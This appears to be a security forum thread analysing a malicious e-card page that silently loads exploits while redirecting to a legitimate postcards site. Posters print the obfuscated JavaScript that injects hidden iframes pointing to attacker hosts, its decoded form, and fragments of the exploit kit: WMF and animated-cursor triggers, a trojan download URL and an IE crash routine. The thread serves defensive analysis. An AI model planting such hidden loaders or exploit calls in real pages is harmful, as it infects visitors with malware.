Hackers, Scammers Hide Malicious JavaScript On Web Sites

interesting link, Ronjor. One more reason to get the Noscript plugin, for people who don't run it!

 

Several of the sites last month with the wmf exploit used this technique. I wanted to test them but the sites went down too quickly.

More recently is the postcards.com e-card email attachment, and one of the sites is still up. If the user clicks on the attachment, it redirects to the postcards.com site (a legitimate site) while executing the javascript in the background.

Here is the code from one page.:

----------------
HEAD> META HTTP-EQUIV="Refresh" CONTENT="10; url=http://postcards.com/DigitalPostcards/pickup.html">
HEAD>

BODY>
CENTER>Processing your request...CENTER>
BODY>


script language=javascript>document.write(unescape('%3c%69%66%72%61%6d%65%20%7
3%72%63%3d%22%68%74%74%70%3a%2f%2f%65%37%64%61%37%2e%69%6e%6
6%6f%2f%6f%75%74%2e%70%68%70%3f%73%5f%69%64%3d%31%22%20%77%69
%64%74%68%3d%30%20%62%6f%72%64%65%72%3d%30%20%68%65%69%67%6
8%74%3d%30%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%
6e%6f%6e%65%22%3e%3c%2f%69%66%72%61%6d%65%3e%3c%69%66%72%61%
6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%61%39%64%61%36
%2e%69%6e%66%6f%2f%6f%75%74%2e%70%68%70%3f%73%5f%69%64%3d%31%
22%20%77%69%64%74%68%3d%30%20%62%6f%72%64%65%72%3d%30%20%68
%65%69%67%68%74%3d%30%20%73%74%79%6c%65%3d%22%64%69%73%70%
6c%61%79%3a%6e%6f%6e%65%22%3e%3c%2f%69%66%72%61%6d%65%3e'))script>
-------------------------

Here are the above values converted to HTML:

----------------------------
iframe
src="http://e7da7.info/out.php?s_id=1" width=0 border=0 height=0
style="display:none">
iframe>

iframe
src="http://a9da6.info/out.php?s_id=1"
width=0 border=0 height=0 style="display:none">
iframe>
-----------------------------

The article points out that the user is sent from one site to another, each downloading one or more files.
Taking the first URL (it no longer works):

http://www.rsjones.net/imgs/postcards_1.gif

http://www.rsjones.net/imgs/postcards_2.gif

From the script in the ie0601.htm file:

----------------------------------
// launching exploit which number is depends on Windows and IE versions

function Get_Win_Version(IE_vers)

case 5:
PageContainer.location="ie0601e.wmf";
------------------------------------------

http://www.rsjones.net/imgs/postcards_3.gif

While all of that would be going on in the background of an unpatched system, the postcards.com site loads:

http://www.rsjones.net/imgs/postcards_4.gif
_________________________________________________


There was much more. There were scripts to determine which browser, AV program, and various exploits could be triggered. One case brought up a page that ran the old cursor vulnerability that downloaded a trojan:

-----------------------------
<style>
* {CURSOR: url("pluginst.anr")}
</style>
-----------------------------

http://www.rsjones.net/imgs/postcards_5.gif
________________________________________________

Another case directly downloaded a the same trojan:

-----------------------------
var Trojan_Path="http://210.0.xxx.xx/cgi-bin/ie0601.cgi?exploit=";
-----------------------------


Another case triggered a heap overflow that crashed the IE browser:

---------------------
function CrashIE()

var stitle="<title>Crash IE</title>";
document.write(stitle);
document.write("<body"+" xxxxxxxx-xxxxxxxxx>");
window.location.reload();
-------------------------------------


All of this started by the simple iframe script.

For more on the js/wonka techniques, see the Websense analysis in the PDF file mentioned at the end of the article.


----

 

They've been using this technique for quite a long time. The first I saw was a "dialer" site picking from the major dialer repository deposito.hostance.net, in 2003. The number of scam/exploit sites using this has been getting bigger and bigger. No matter how they try to offuscate it, though, you'll ALWAYS be able to "decrypt" the underlying code, as it is needed for the browser to render it.

 

Hi,
Rich did you try these with Firefox (with javascript enabled / disabled) / Opera?
Mrk

 

Hi Mrk, even with javascript enabled, the exploits would not run in Opera - the animated cursor vulnerability, for example (via the .anr file).

As I mentioned, using IE with javascript enabled, the exploits would run on an unpatched system.

The wmf file did not run here, rather, prompted a download because I have Win2k which has no FAX viewer.

But in looking at all of the results/cases in the script, there is no reason why anyone who has the MS patches installed would be vulnerable to this e-card email exploit. Even with javascript enabled in IE, the scripts would run but each exploit would fail to execute if the system/browser were patched.

In the scripts, the exploits even are named by the MS bulletin number:

{ ExploitNumber=1; }
if (PatchList=="SP2")
{ XP_SP2_patched=1; }
case 1:
Trojan_Path=Trojan_Path+"MS03-11";

----------------------
This is in the .anr file:

hxxp://210.7.77.226/cgi-bin/ie0601.cgi?exploit=MS05-002
________________________________________

See here for descriptions of similar exploits:


http://archives.neohapsis.com/archives/fulldisclosure/2004-10/0467.html

http://national.auscert.org.au/render.html?it=4474&cid=

The latter concludes, "Installation of the patches mentioned in Microsoft security bulletin MS03-011 [2], MS04-038 [4] and MS02-055 [5] will protect a computer against all three of the above mentioned vulnerabilities."

Of course, the most secure patch is the one in the user's head that says, "Do not click on attachment."


----

 

As long as they are not exploiting zero day bugs, this really is not that scary, I mean a lot of sites are infected, I also get warnings from AntiVir if a site is infected, but because of my hardened IE settings the malware would not be able to do any damage even if not blocked by an AV/AT.

 

*huggles noscript firefox extension*